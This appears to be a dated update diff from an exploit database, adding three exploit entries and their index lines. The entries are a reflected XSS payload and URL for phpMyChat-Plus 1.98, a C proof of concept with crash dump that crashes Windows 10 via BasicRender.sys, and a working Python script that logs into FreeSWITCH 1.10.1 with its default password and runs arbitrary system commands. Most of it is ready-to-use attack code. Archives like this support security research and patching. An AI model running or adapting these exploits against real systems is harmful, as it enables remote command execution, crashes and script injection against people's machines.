DB: 2019-12-21

4 changes to exploits/shellcodes

Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)

FreeSWITCH 1.10.1 - Command Execution

phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting

exploits/hardware/webapps/47776.txt

@@ -7,7 +7,7 @@
 # Hardware Version: T1
 # Firmware Version: 20.07
 # Tested on: Windows 10 and Kali linux
-# CVE: N/A
+# CVE: CVE-2019-19742
 
 Reproduction Steps:
 1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]

exploits/php/webapps/47798.txt

@@ -0,0 +1,17 @@
+# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
+# Date: 2019-12-19
+# Exploit Author: Chris Inzinga
+# Vendor Homepage: http://ciprianmp.com/latest/
+# Download: https://sourceforge.net/projects/phpmychat/
+# Tested On: Linux & Mac
+# Version: 1.98
+# CVE: CVE-2019-19908
+
+Description: 
+The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS
+
+Payload: 
+"><script>alert('xss')</script>
+
+Vulnerable URL: 
+http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>

exploits/windows/dos/47797.c

@@ -0,0 +1,115 @@
+# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
+# Date: 2019-12-20
+# Exploit author: vportal
+# Vendor homepage: http://www.microsoft.com
+# Version: Windows 10 1803 x86
+# Tested on: Windows 10 1803 x86
+# CVE: N/A
+
+# A Null pointer deference exists in the WARPGPUCMDSYNC function of the
+# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
+# to crash the system and deny the service to the rest of the users.
+
+*PoC:*
+
+#include <Windows.h>
+#include <d3dkmthk.h>
+
+D3DKMT_CREATEDEVICE* device = NULL;
+device = new D3DKMT_CREATEDEVICE();
+
+D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
+D3DKMTEnumAdapters(&enumAdapter);
+device->hAdapter = enumAdapter.Adapters[1].hAdapter;
+logger(log_counter, "EnumAdapter");
+
+D3DKMTCreateDevice(device);
+
+D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
+contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
+memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
+
+contextVirtual->hDevice = device->hDevice;
+
+char data[0x200] = { 0 };
+memset(data, 0xff, 0x200);
+
+contextVirtual->PrivateDriverDataSize = 0x200;
+contextVirtual->pPrivateDriverData = data;
+
+contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
+contextVirtual->Flags.InitialData = 0x000001;
+contextVirtual->Flags.NullRendering = 0x0;
+
+D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
+submitCommand = new D3DKMT_SUBMITCOMMAND();
+
+submitCommand->BroadcastContext[0] = 0x40000240;
+
+for (int i = 0; i < 0x10; i++)
+     submitCommand->WrittenPrimaries[i] = 0x0;
+
+submitCommand->PresentHistoryToken = 0x100;
+submitCommand->Commands = 0x004b39;
+submitCommand->CommandLength = 0x00000d;
+submitCommand->BroadcastContext[0] = contextVirtual->hContext;
+submitCommand->BroadcastContextCount = 0x1;
+submitCommand->Flags.PresentRedirected = 0x1;
+
+submitCommand->PrivateDriverDataSize = 0x130;
+
+char* PrivateData = NULL;
+PrivateData = new char[submitCommand->PrivateDriverDataSize];
+memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
+
+*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
+*(DWORD*)(PrivateData + 0x11c) = 0x18;
+*(DWORD*)(PrivateData + 0x120) = 0x000110;
+*(DWORD*)(PrivateData + 0x124) = 0x000420;
+*(DWORD*)(PrivateData + 0x128) = 0x0;
+*(DWORD*)(PrivateData + 0x12c) = 0x000428;
+
+submitCommand->pPrivateDriverData = PrivateData;
+
+D3DKMTSubmitCommand(submitCommand);
+
+
+--------------------------------------------------------------------------
+*Crash dump*:
+
+STACK_TEXT:
+8afae92c 8fe82cb2 8afae958 fffffffd 0000048c
+BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
+8afae94c 8fe8267d bb26afe8 00000000 bb26afe0
+BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
+8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000
+BasicRender!WarpKMSubmitCommandVirtual+0x87
+8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6
+dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
+8afaea08 92b19db6 90114c30 8afaea68 b78da008
+dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
+8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860
+dxgmms2!VidSchiSendToExecutionQueue+0x526
+8afaeb90 92b764a9 00000000 945f5a80 00000000
+dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
+8afaebb8 81ee80bc 93dfc000 28e5f697 00000000
+dxgmms2!VidSchiWorkerThread+0x1a1
+8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
+8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15
+
+eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000
+edi=bb26afd8
+eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0         nv up ei pl zr na pe
+nc
+cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000
+efl=00010246
+BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
+8fe8386c c7061060e88f    mov     dword ptr [esi],offset
+BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
+Resetting default scope
+
+--------------------------------------------------------------------------------
+
+The vulnerability has only been tested  in Windows 10 x86 1803.
+CVSS Base Score: 5.5
+Credit: Victor Portal

exploits/windows/remote/47799.txt

@@ -0,0 +1,52 @@
+# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
+# Date: 2019-12-19
+# Exploit Author: 1F98D
+# Vendor Homepage: https://freeswitch.com/
+# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
+# Version: 1.10.1
+# Tested on: Windows 10 (x64)
+#
+# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
+# it after authenticating. By default commands are not accepted from remote hosts.
+#
+# -- Example --
+# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
+# Authenticated
+# Content-Type: api/response
+# Content-Length: 20
+#
+# nt authority\system
+# 
+
+#!/usr/bin/python3
+
+from socket import *
+import sys
+
+if len(sys.argv) != 3:
+    print('Missing arguments')
+    print('Usage: freeswitch-exploit.py <target> <cmd>')
+    sys.exit(1)
+
+ADDRESS=sys.argv[1]
+CMD=sys.argv[2]
+PASSWORD='ClueCon' # default password for FreeSWITCH
+
+s=socket(AF_INET, SOCK_STREAM)
+s.connect((ADDRESS, 8021))
+
+response = s.recv(1024)
+if b'auth/request' in response:
+    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
+    response = s.recv(1024)
+    if b'+OK accepted' in response:
+        print('Authenticated')
+        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
+        response = s.recv(8096).decode()
+        print(response)
+    else:
+        print('Authentication failed')
+        sys.exit(1)
+else:
+    print('Not prompted for authentication, likely not vulnerable')
+    sys.exit(1)

files_exploits.csv

@@ -6625,6 +6625,7 @@ id,file,description,date,author,type,platform,port
 47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
+47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17868,6 +17869,7 @@ id,file,description,date,author,type,platform,port
 47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
 47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
 47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
+47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42103,3 +42105,4 @@ id,file,description,date,author,type,platform,port
 47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
 47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
 47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
+47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,